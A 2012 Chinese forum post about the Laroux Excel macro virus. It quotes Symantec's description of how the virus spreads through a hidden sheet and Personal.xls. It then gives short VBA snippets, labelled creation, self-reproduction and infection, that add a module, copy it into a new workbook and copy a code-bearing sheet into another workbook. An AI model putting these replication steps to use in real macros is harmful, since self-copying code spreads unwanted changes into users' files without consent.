|
|
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用 · 内置多项VBA编程加强工具 ★ 免费下载 ★ ★ 使用手册★
本帖最后由 kangatang 于 2012-9-18 09:09 编辑
-----------------------------------------------Laroux家族--------------------------------------
众所周知,当提到Laroux的时候,一般给出的感染技术介绍都是这样的:
".......一个被隐藏的、带有病毒代码的sheet被复制到未被感染的EXCEL文件中......完成病毒感染......"
Symantec对Laroux的介绍如下:
“
In infected spreadsheet files (Excel workbooks), the "laroux" datasheet is not readily visible (it is hidden). When an infected spreadsheet is
first opened on a system, the Auto_Open macro is automatically run by Excel, which in turn runs the Check_Files macro. This happens each
time a worksheet is activated.
The Check_Files macro then copies the worksheet with the virus code into a spreadsheet file stored in the Excel startup directory named
Personal.xls. (By default, this directory is \MSOffice\Excel\XLStart.) Personal.xls is the "global macro spreadsheet;" macros stored there are
automatically available to all other Excel spreadsheets on the system. Copying these macros to Personal.xls enables the infection of all other
spreadsheets opened or created on the infected system in the future.
XM.Laroux contains no deliberately destructive payloads: it exists only to replicate. XM.Laroux only works on Microsoft Windows operating
systems using Excel versions 5 and 7. It does not work in the Macintosh environment.
XM.Laroux is written in English.
”
现在就制作这样一张神奇的sheet
STEP 1 (建立)
如果你运行
sub test1
Thisworkbook.Modules.Add
end sub
会新建一个module.
====================================
STEP 2 (自我繁衍)
然后,你在这个新建的module里加入以下procedure
sub test2
thisworkbook.modules.copy
end sub
会自动新建一个book1.xls
最神奇的地方出现了,它会自我复制。
这个book1.xls居然有STEP 2里面那个新建的module.
=====================================
STEP 3 (感染)
新建一个workbook,命名为mytest.xls
在STEP 1里的那个workbook里面运行
Sub test3
ThisWorkbook.Sheets(1).Copy before:=Workbooks("mytest.xls").Sheets(1)
End Sub
然后再看看mytest.xls,里面多了个module,跟STEP 1里的那个一摸一样。
=====================================
讲到这里,你或许觉得原理是如此的简单。但很少人知道这一点(不要以为你已经知道了)。
-----------------------------------------------宏4.0病毒-------------------------------------------------
Coming soon....
-----------------------------------------------COPYMOD 和K4等新兴病毒------------------------------
Coming soon....
-----------------------------------------------历史上其他宏病毒盘点------------------------------------
Coming soon....
|
|
沪公网安备 31011702000001号 沪ICP备11019229号-2
发表于 2012-3-7 15:27
楼主
